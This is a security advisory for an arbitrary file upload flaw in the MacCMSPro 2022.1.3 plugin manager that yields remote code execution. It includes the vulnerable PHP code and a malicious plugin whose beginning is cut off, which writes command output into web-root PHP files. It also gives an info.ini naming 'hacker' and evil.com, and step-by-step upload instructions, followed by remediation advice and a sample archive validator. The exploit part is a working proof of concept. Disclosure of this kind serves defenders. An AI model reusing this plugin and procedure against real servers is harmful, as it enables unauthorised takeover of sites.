# MacCMSPro Plugin Management Arbitrary File Upload Vulnerability Security Report #1

## Vulnerability Overview

MacCMSPro has a security vulnerability in its plugin management feature, allowing attackers to upload arbitrary files. By uploading a plugin package containing malicious code, an attacker can exploit the backend plugin installation functionality to directly execute user-uploaded code during the installation process, thereby achieving remote code execution (RCE) and gaining full control of the server.

## Impact Scope

- **Affected Version**: MacCMS Pro 2022.1.3
- **Official Website**: https://www.macms.pro/

## Vulnerability Analysis and Exploit Code

### Core Vulnerable Code

```php
// [1] Verify file extension and size (only the ZIP extension is verified)
$info = $file->rule('uniqid')->validate(['size' => 10240000, 'ext' => 'zip'])->move($...
if ($info) {
    $tmpName = substr($info->getFilename(), 0, strpos($info->getFilename(), '.'));
    $tmpAddonDir = ADDON_PATH . $tmpName . DS;
    $tmpFile = $addonTmpDir . $info->getSaveName();

    // [2] Installing the plugin
    install(); // Execute the installation method (which can include any code)
}
}
```

### Malicious Plugin Code (Cmdplugin.php)

```php
";
        $file_path = 'C:\\phpstudy\\phpstudy_pro\\WWW\\whoami.php';
        file_put_contents($file_path, $content);

        // Also create a file to display detailed information
        $detail_content = "System Command Execution TestCurrent User: " . trim($output) . "";
        $detail_path = 'C:\\phpstudy\\phpstudy_pro\\WWW\\cmd_result.php';
        file_put_contents($detail_path, $detail_content);

        return true;
    }

    public function uninstall()
    {
        return true;
    }

    public function enable()
    {
        return true;
    }

    public function disable()
    {
        return true;
    }
}
```

### Plugin Configuration File (info.ini)

```ini
name = cmdplugin
title = Command Execution Plugin
type = plugins
intro = System command execution test
author = hacker
website = http://evil.com
version = 1.0.0
state = 0
```

### Exploitation Steps

1. Package the above code into `cmdplugin.zip`
2. Log in to the admin panel (`/admin/admin/addon/add.html`)
3. Click “Offline Install” → “Upload”
4. Upload the malicious zip file
5. Access the generated files to trigger command execution:
   - `http://xxx.xxx.xxx/whoami.php`
   - `http://xxx.xxx.xxx/cmd_result.php`

### Remediation Measures

1. **Validate Plugin Content**: Before installing a plugin, perform strict security scanning and validation of the uploaded zip file contents.
2. **Restrict Code Execution**: Prohibit direct execution of user-provided code during plugin installation, especially within the `install()` method.
3. **Sandbox Mechanism**: Run the plugin installation process in an isolated sandbox environment to limit access to server resources.
4. **Access Control**: Ensure the plugin installation process follows the principle of least privilege, avoiding execution of code with high privileges.
5. **Code Audit**: Conduct a comprehensive code audit of the plugin management module and fix all potential security vulnerabilities.
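As an added illustration of remediation measure 1 (this is example code, not MacCMSPro's own), the following check inspects an uploaded plugin archive before anything in it is extracted or its `install()` method is called; the function name, the allowed-extension list and the requirement that `info.ini` carry a `name` matching the target plugin directory are assumptions of this example.

```php
<?php
// Example (not MacCMSPro code): structural validation of an uploaded plugin zip.
// Returns a list of problems; an empty list means the archive passed these checks.
function validatePluginArchive(string $zipPath, string $expectedName): array
{
    $errors = [];
    // Assumed allow-list of file types a plugin may ship.
    $allowedExt = ['php', 'ini', 'html', 'js', 'css', 'png', 'jpg', 'gif', 'svg', 'txt', 'md'];

    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return ['archive cannot be opened as a zip file'];
    }

    $hasInfo = false;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->statIndex($i)['name'];

        // Entries must stay inside the plugin directory: no "..", no absolute
        // or drive-letter paths (the install path is ADDON_PATH . $tmpName . DS).
        if (strpos($name, '..') !== false || $name[0] === '/' || preg_match('/^[A-Za-z]:/', $name)) {
            $errors[] = "unsafe entry path: $name";
            continue;
        }
        if (substr($name, -1) === '/') {
            continue; // directory entry, nothing to check
        }

        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (!in_array($ext, $allowedExt, true)) {
            $errors[] = "disallowed file type: $name";
        }

        // The manifest must exist at the archive root and name the plugin being installed,
        // so the package cannot be dropped into some other plugin's directory.
        if ($name === 'info.ini') {
            $hasInfo = true;
            $ini = parse_ini_string((string) $zip->getFromIndex($i), false, INI_SCANNER_RAW);
            if (!is_array($ini) || ($ini['name'] ?? '') !== $expectedName) {
                $errors[] = 'info.ini is malformed or its name does not match the target plugin';
            }
        }
    }
    $zip->close();

    if (!$hasInfo) {
        $errors[] = 'info.ini not found at archive root';
    }
    return $errors;
}
```

These checks only reject malformed, traversing or mislabelled packages; because the installer still executes the plugin's own `install()` method, they must be combined with measure 2 (or with accepting only packages signed by a trusted publisher) to close the RCE path.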